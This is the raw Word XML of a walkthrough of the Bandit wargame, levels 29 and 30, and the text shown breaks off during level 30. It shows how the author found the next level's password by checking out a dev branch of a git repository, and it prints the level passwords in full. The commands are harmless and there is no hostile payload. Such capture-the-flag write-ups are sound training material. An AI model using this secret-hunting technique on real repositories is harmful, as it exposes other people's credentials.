      </w:r>
      <w:r w:rsidR="002E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Which means that </w:t>
      </w:r>
      <w:r w:rsidR="007A6D6D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">the next level’s password is: </w:t>
      </w:r>
      <w:r w:rsidR="007A6D6D" w:rsidRPr="007A6D6D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bbc96594b4e001778eee9975372716b2</w:t>
      </w:r>
      <w:r w:rsidR="007A6D6D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469029CA" w14:textId="23A01708" w:rsidR="00587AA6" w:rsidRDefault="00587AA6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4FA05B62" w14:textId="7BD49AA4" w:rsidR="00587AA6" w:rsidRDefault="00587AA6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587AA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FAB508" w14:textId="0E3A3BDF" w:rsidR="00A52858" w:rsidRDefault="00A52858" w:rsidP="00A52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Before I cloned the repository, I created a directory in tmp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FFD670" w14:textId="02877B7B" w:rsidR="00A52858" w:rsidRDefault="00A52858" w:rsidP="00A52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372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuelGit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD25B0F" w14:textId="77777777" w:rsidR="00A52858" w:rsidRDefault="00A52858" w:rsidP="00A52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</w:p>
    <w:p w14:paraId="4CFC1628" w14:textId="77777777" w:rsidR="00A52858" w:rsidRDefault="00A52858" w:rsidP="00A52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Then I cloned the repository using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEACFD9" w14:textId="24BCB40E" w:rsidR="00A52858" w:rsidRDefault="00A52858" w:rsidP="00A52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 w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git clone ssh://bandit2</w:t>
      </w:r>
      <w:r w:rsidR="007C74CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>-git@localhost/home/bandit2</w:t>
      </w:r>
      <w:r w:rsidR="007C74CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>-git/repo /tmp/samuelGit</w:t>
      </w:r>
      <w:r w:rsidR="007C74CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434B770" w14:textId="4AA0F6DB" w:rsidR="00A52858" w:rsidRDefault="00A52858" w:rsidP="00A5285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I entered the password (</w:t>
      </w:r>
      <w:r w:rsidR="007C74CD" w:rsidRPr="008E784F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>bbc96594b4e001778eee9975372716b2</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FFA897" w14:textId="77777777" w:rsidR="003A0D1C" w:rsidRPr="003A0D1C" w:rsidRDefault="00A52858" w:rsidP="003A0D1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3A0D1C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="003A0D1C" w:rsidRPr="003A0D1C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Counting objects: 16, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F37B6D" w14:textId="77777777" w:rsidR="003A0D1C" w:rsidRPr="003A0D1C" w:rsidRDefault="003A0D1C" w:rsidP="003A0D1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3A0D1C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Compressing objects: 100% (11/11), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D2E4E2" w14:textId="77777777" w:rsidR="003A0D1C" w:rsidRPr="003A0D1C" w:rsidRDefault="003A0D1C" w:rsidP="003A0D1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3A0D1C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Total 16 (delta 2), reused 0 (delta 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3753C" w14:textId="77777777" w:rsidR="003A0D1C" w:rsidRPr="003A0D1C" w:rsidRDefault="003A0D1C" w:rsidP="003A0D1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3A0D1C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receiving objects: 100% (16/16), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214FC24C" w14:textId="1F06053A" w:rsidR="00A52858" w:rsidRPr="003A0D1C" w:rsidRDefault="003A0D1C" w:rsidP="003A0D1C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3A0D1C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resolving deltas: 100% (2/2), done</w:t>
      </w:r>
      <w:r w:rsidR="00A52858" w:rsidRPr="003A0D1C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E3843" w14:textId="6691FCD9" w:rsidR="00320DBF" w:rsidRDefault="00320DBF" w:rsidP="00105E75">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after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entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00320DBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cd /tmp/samuelGit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00320DBF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 xml:space="preserve">and viewed the repository files using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309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 xml:space="preserve">and saw there was a single file named </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>README</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. With the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat README</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.md</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309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 xml:space="preserve">I got the output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E75294" w14:textId="5372770E" w:rsidR="00105E75" w:rsidRPr="0046200B" w:rsidRDefault="00105E75" w:rsidP="0046200B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6200B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“# Bandit Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57F9B1" w14:textId="77777777" w:rsidR="00105E75" w:rsidRPr="0046200B" w:rsidRDefault="00105E75" w:rsidP="0046200B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6200B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some notes for bandit30 of bandit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1312D3F2" w14:textId="77777777" w:rsidR="00105E75" w:rsidRPr="0046200B" w:rsidRDefault="00105E75" w:rsidP="0046200B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0C6EDBE4" w14:textId="6CD4BF8F" w:rsidR="00105E75" w:rsidRPr="0046200B" w:rsidRDefault="00105E75" w:rsidP="0026363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6200B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>## credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F68210" w14:textId="77777777" w:rsidR="00105E75" w:rsidRPr="0046200B" w:rsidRDefault="00105E75" w:rsidP="0046200B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6200B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- username: bandit30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38403B89" w14:textId="5F4CB654" w:rsidR="00105E75" w:rsidRPr="0046200B" w:rsidRDefault="00105E75" w:rsidP="00105E7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46200B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- password: &lt;no passwords in production!&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614984C5" w14:textId="266EA231" w:rsidR="001801F3" w:rsidRDefault="001801F3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424A5AF1" w14:textId="62EACF3C" w:rsidR="00263638" w:rsidRDefault="00263638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With git branch –all I saw there are other branches in origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC87377" w14:textId="77777777" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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63638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“* </w:t>
      </w:r>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31028CED" w14:textId="77777777" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>remotes/origin/HEAD -&gt; origin/master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E51AC4" w14:textId="77777777" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  remotes/origin/dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7540B3A8" w14:textId="77777777" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  remotes/origin/master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D19EB" w14:textId="4E3927CC" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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63638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  remotes/origin/sploits-dev</w:t>
      </w:r>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79584DF1" w14:textId="77777777" w:rsidR="00263638" w:rsidRDefault="00263638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4152F752" w14:textId="5A56AB7C" w:rsidR="00263638" w:rsidRDefault="00263638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With </w:t>
      </w:r>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git checkout &lt;branchName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00263638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>I could switch to other branches…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29359F8D" w14:textId="3A289117" w:rsidR="00263638" w:rsidRDefault="00263638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The origin/HEAD and origin/master was the same like our master branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F113456" w14:textId="26352C85" w:rsidR="00263638" w:rsidRDefault="00263638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But inside origin/dev the README.md file was different:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBDB764" w14:textId="77777777" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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63638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“bandit29@bandit:/tmp/samuelGit3/repo$ cat README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F31379D" w14:textId="77777777" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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63638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># Bandit Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3F9FF" w14:textId="1677949E" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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63638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some notes for bandit30 of bandit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2768DE" w14:textId="176B9D20" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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63638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>## credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEEDEEC" w14:textId="77777777" w:rsidR="00263638" w:rsidRPr="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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63638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- username: bandit30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9AE20" w14:textId="42F82BB2" w:rsidR="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5b90576bedb2cc04c86a9e924ce42faf</w:t>
      </w:r>
      <w:r w:rsidRPr="00263638">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B13503" w14:textId="3A4B9CC4" w:rsidR="00263638" w:rsidRDefault="00263638" w:rsidP="0026363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01C9DB88" w14:textId="57EDC3EE" w:rsidR="00263638" w:rsidRPr="00794049" w:rsidRDefault="00794049" w:rsidP="0026363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794049">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED32E8" w14:textId="6CAAC1D3" w:rsidR="00D7247A" w:rsidRDefault="00D7247A" w:rsidP="00D7247A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color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">I created a folder with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7247A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuelGit4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7247A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 xml:space="preserve">and cloned the repository using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git clone ssh://bandit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>-git@localhost/home/bandit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>-git/repo /tmp/samuelGit</w:t>
      </w:r>
      <w:r w:rsidR="00D94630">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A7B25" w14:textId="07A1BEFC" w:rsidR="00CB49F1" w:rsidRDefault="00CB49F1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I entered the password (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>5b90576bedb2cc04c86a9e924ce42faf</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3897132D" w14:textId="77777777" w:rsidR="00CB49F1" w:rsidRPr="00CB49F1" w:rsidRDefault="00CB49F1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B49F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“remote: Counting objects: 4, done.</w:t>
      </w:r>
    </w:p>
